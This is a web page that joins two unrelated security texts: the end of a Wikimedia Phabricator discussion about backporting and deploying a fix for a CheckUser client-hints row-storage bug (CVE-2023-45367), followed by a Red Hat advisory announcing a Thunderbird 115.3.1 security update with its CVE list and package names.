So at the very least there should be a public backport to master or main for any security patch, which I see you've now done in c952482. If the patch is not relevant for other supported release branches, then no further effort needs to be expended in backporting it to said branches. I'll go ahead and make this task public now as well.

sbassett changed Risk Rating from N/A to Medium.

Comment Actions

I had assumed that the name "backport" applied only to patches not on the master branch. My intended meaning was that it didn't need to be cherry picked to other branches from the master branch.

Comment Actions

Fix is deployed on production, but waiting for code review on the master branch.

Comment Actions

/srv/patches/1.41.0-wmf.24/extensions/CheckUser/01-T344923-2.patch fails to apply as of Tue, 29 Aug 2023 00:55:16 UTC.

Comment Actions

> /srv/patches/1.41.0-wmf.24/extensions/CheckUser/01-T344923-2.patch fails to apply as of Tue, 29 Aug 2023 00:55:16 UTC.

This has been merged into the master branch, so should be in wmf.24. As such I presume it is safe to ignore this for wmf.24.

Comment Actions

> /srv/patches/1.41.0-wmf.24/extensions/CheckUser/01-T344923-2.patch fails to apply as of Tue, 29 Aug 2023 00:55:16 UTC.

Do we still need this patch? @thcipriani sycned it on August 24 (T344923#9118791) and the master branch patch merged on August 26 (T344923#9121451).

Comment Actions

Sounds like we don't need the patch anymore so I removed it.

Comment Actions

I have only been able to store up to 10 rows each for brands and fullVersionList in the cu\_useragent\_clienthints table.

**Test environment:** local docker mysql CheckUser 2.5 (dfa9b11) 20:20, 4 September 2023.

Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2023-45367: ⚓ T344923 User can store arbitrary number of rows in cu_useragent_clienthints

Red Hat Security Advisory 2023-5475-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 115.3.1. Issues addressed include buffer overflow, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:5475-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5475  
Issue date:        2023-10-05  
CVE Names:         CVE-2023-3600 CVE-2023-5169 CVE-2023-5171  
                   CVE-2023-5176 CVE-2023-5217  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.3.1.

Security Fix(es):

* firefox: use-after-free in workers (CVE-2023-3600)

* Mozilla: Out-of-bounds write in PathOps (CVE-2023-5169)

* Mozilla: Use-after-free in Ion Compiler (CVE-2023-5171)

* Mozilla: Memory safety bugs fixed in Firefox 118, Firefox ESR 115.3, and  
Thunderbird 115.3 (CVE-2023-5176)

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2222652 - CVE-2023-3600 firefox: use-after-free in workers  
2240893 - CVE-2023-5169 Mozilla: Out-of-bounds write in PathOps  
2240894 - CVE-2023-5171 Mozilla: Use-after-free in Ion Compiler  
2240896 - CVE-2023-5176 Mozilla: Memory safety bugs fixed in Firefox 118, Firefox ESR 115.3, and Thunderbird 115.3  
2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-115.3.1-1.el7_9.src.rpm

x86_64:  
thunderbird-115.3.1-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-115.3.1-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-115.3.1-1.el7_9.src.rpm

ppc64le:  
thunderbird-115.3.1-1.el7_9.ppc64le.rpm  
thunderbird-debuginfo-115.3.1-1.el7_9.ppc64le.rpm

x86_64:  
thunderbird-115.3.1-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-115.3.1-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-115.3.1-1.el7_9.src.rpm

x86_64:  
thunderbird-115.3.1-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-115.3.1-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3600  
https://access.redhat.com/security/cve/CVE-2023-5169  
https://access.redhat.com/security/cve/CVE-2023-5171  
https://access.redhat.com/security/cve/CVE-2023-5176  
https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlHyo5AAoJENzjgjWX9erErHgP/RecI+C2vPcgutXV+SQkJCFP  
4Ys7eizV95uyuNE1hveNkkfESiYubhz1lzJTXvw1C+cVdSGrXfBoLfEkyAqRYelH  
iX2LdMb9eHNaCxh+TFvslmzvxFwSZVRjxOp5LRitqO++RskvrnZipTZfijz9V4Wv  
iFuT3LPsxFZHI0L0hcjzGqafUV/QWiaHKNmzaUA1FaITs0crZgCBf6LpDWH+I5IJ  
cS4qqMuw6cop4WOQk20slPNWL38yA+kvGeNi9zAnC36i47+AsDTsXasur4aRpYPU  
vID5C2rCaVz3jt40DrH04evUXVb4//lu2rLQXaP+7ALLWkdeOcy83MrJ+otzK3Lf  
yN+5d8ajxB+M4MMQKhKQlhHcNzIo85nfA9+LUFKeaxB4PmAl4mHDbouhe+dFAmHs  
jnY/gY3lsRQ2tcic3R9NF5I5Jane+XhTGhVQcVyuX6plCThzib+3i0VYwtvKfhrg  
qNDFXhxeBGzQBUYGGzb2wISj5DnBpkX6igMnFtS49nf2eEeii+hdhIQIdMRgWwy9  
arMD/DHZMo1Aq/EDRMw74+gO5LMouemP6tszJClNhkAAc3UTKy5fRrE7jiI3qgL5  
WzRqNUV+qBAScTJUD21WSbosdTleadjfiUfgDEOrP5OgGlQpIsUE6AvXVx6ebGji  
9DRa0mOSRIF6itYY5nAp  
=CqNY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox